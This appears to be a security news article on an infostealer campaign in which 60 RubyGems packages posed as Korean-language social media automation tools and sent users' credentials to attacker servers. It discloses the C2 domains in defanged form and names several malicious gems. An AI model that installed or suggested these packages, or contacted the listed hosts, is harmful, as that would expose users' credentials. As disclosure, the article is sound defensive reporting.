Socket’s Threat Research Team has exposed a sophisticated supply chain attack targeting the RubyGems ecosystem, where a persistent threat actor deployed 60 malicious packages over 18 months to steal user credentials.
Operating under aliases including zon, nowon, kwonsoonje, and soonje, the attacker distributed infostealer malware disguised as automation tools for popular platforms like Instagram, Twitter/X, TikTok, WordPress, and Telegram since March 2023.
Sophisticated Credential Harvesting Operation
The malicious gems function as fully operational automation tools, delivering their advertised functionality while covertly exfiltrating user credentials to threat actor-controlled infrastructure.
Each package features Korean-language graphical interfaces built with Glimmer-DSL-LibUI, prompting users to enter social media credentials that are immediately transmitted via HTTP POST requests to command-and-control servers including programzon[.]com, appspace[.]kr, and marketingduo[.]co[.]kr.
Technical analysis reveals consistent credential theft behavior across all packages. The malware captures not only usernames and passwords but also MAC addresses for victim fingerprinting and correlation across multiple infections.
The threat actor maintained redundant C2 endpoints throughout the campaign while regularly cycling infrastructure and aliases to evade detection.
The campaign demonstrates remarkable persistence and sophistication. Of the 60 identified malicious gems, 16 remain active on RubyGems under the nowon, kwonsoonje, and soonje accounts.
At the same time, 44 packages published under the zon alias were subsequently yanked but remain accessible through cached mirrors. Collectively, these packages accumulated over 275,000 downloads, though this figure doesn’t directly correlate to compromised systems.
Grey-Hat Marketers Targeted in Strategic Attack
The campaign targets explicitly South Korean grey-hat marketers who rely on disposable identities and automation tools for spam, SEO manipulation, and synthetic engagement operations.
marketingduo[.]co[.]kr as logged-in users, indicating they are registered customers of the service. These systems also show activity on platforms used to acquire fake accounts, followers, views, and related spam infrastructure.This demographic proves ideal for the attack vector due to their frequent use of throwaway social media accounts and reluctance to report credential theft incidents.
Infostealer logs from compromised systems reveal victims actively using SMM panels, backlink manipulation services, account marketplaces, and proxy rotation tools.
Several malicious gems, including njongto_duo and jongmogtolon, explicitly target financial discussion forums, enabling both bulk posting automation and credential harvesting for potential market manipulation activities.
njongto_duo RubyGem reveals its dual function as both a stock forum autoposter and an infostealer. The threat actor’s infrastructure directly connects to Korean-language marketing sites advertising identical automation products, suggesting a dual-revenue model combining legitimate tool sales with credential theft.
Socket has reported the campaign to RubyGems security teams and recommends implementing their security tooling, including GitHub App integration, CLI scanning, and browser extensions, to detect malicious packages before installation.
Malicious Gems — zon Alias
back_duobacklink_zoncafe_basicscafe_basics_duo
Find this Story Interesting! Follow us on LinkedIn and X to Get More Instant Updates
.jpg?resize=1068,580&ssl=1&description=RubyGems Hijack - Socket's Threat Research Team has exposed a sophisticated supply chain attack targeting the RubyGems ecosystem){kind=link}